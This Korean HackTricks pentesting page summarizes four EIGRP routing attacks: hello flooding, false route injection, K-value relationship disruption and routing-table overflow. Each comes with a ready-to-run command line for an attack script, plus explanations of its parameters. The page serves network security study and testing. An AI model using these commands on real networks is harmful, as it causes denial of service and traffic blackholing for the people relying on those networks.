EIGRP Attacks
Last updated
Last updated
AWS 해킹 학습 및 실습:HackTricks Training AWS Red Team Expert (ARTE) GCP 해킹 학습 및 실습: HackTricks Training GCP Red Team Expert (GRTE)
이것은 https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9에 노출된 공격에 대한 요약입니다. 자세한 정보는 해당 링크를 확인하세요.
목적: EIGRP hello 패킷을 통해 라우터 CPU를 과부하시켜 서비스 거부 (DoS) 공격을 유발할 수 있습니다.
도구: helloflooding.py 스크립트.
실행: %%%bash ~$ sudo python3 helloflooding.py --interface eth0 --as 1 --subnet 10.10.100.0/24 %%%
매개변수:
--interface
: 네트워크 인터페이스를 지정합니다. 예: eth0
.
--as
: EIGRP 자율 시스템 번호를 정의합니다. 예: 1
.
--subnet
: 서브넷 위치를 설정합니다. 예: 10.10.100.0/24
.
목적: 거짓 경로를 주입하여 네트워크 트래픽 흐름을 방해하여 트래픽이 존재하지 않는 대상으로 전송되는 블랙홀을 유도합니다.
도구: routeinject.py 스크립트.
실행: %%%bash ~$ sudo python3 routeinject.py --interface eth0 --as 1 --src 10.10.100.50 --dst 172.16.100.140 --prefix 32 %%%
매개변수:
--interface
: 공격자 시스템 인터페이스를 지정합니다.
--as
: EIGRP AS 번호를 정의합니다.
--src
: 공격자 IP 주소를 설정합니다.
--dst
: 대상 서브넷 IP를 설정합니다.
--prefix
: 대상 서브넷 IP의 마스크를 정의합니다.
목적: 변경된 K-값을 주입하여 EIGRP 도메인 내에서 지속적인 중단 및 재연결을 생성하여 DoS 공격을 유발합니다.
도구: relationshipnightmare.py 스크립트.
실행: %%%bash ~$ sudo python3 relationshipnightmare.py --interface eth0 --as 1 --src 10.10.100.100 %%%
매개변수:
--interface
: 네트워크 인터페이스를 지정합니다.
--as
: EIGRP AS 번호를 정의합니다.
--src
: 유효한 라우터의 IP 주소를 설정합니다.
목적: 거짓 경로를 사용하여 라우터의 CPU 및 RAM을 과부하시켜 라우팅 테이블을 다수의 잘못된 경로로 침범합니다.
도구: routingtableoverflow.py 스크립트.
실행: %%%bash sudo python3 routingtableoverflow.py --interface eth0 --as 1 --src 10.10.100.50 %%%
매개변수:
--interface
: 네트워크 인터페이스를 지정합니다.
--as
: EIGRP AS 번호를 정의합니다.
--src
: 공격자의 IP 주소를 설정합니다.
AWS 해킹 학습 및 실습:HackTricks Training AWS Red Team Expert (ARTE) GCP 해킹 학습 및 실습: HackTricks Training GCP Red Team Expert (GRTE)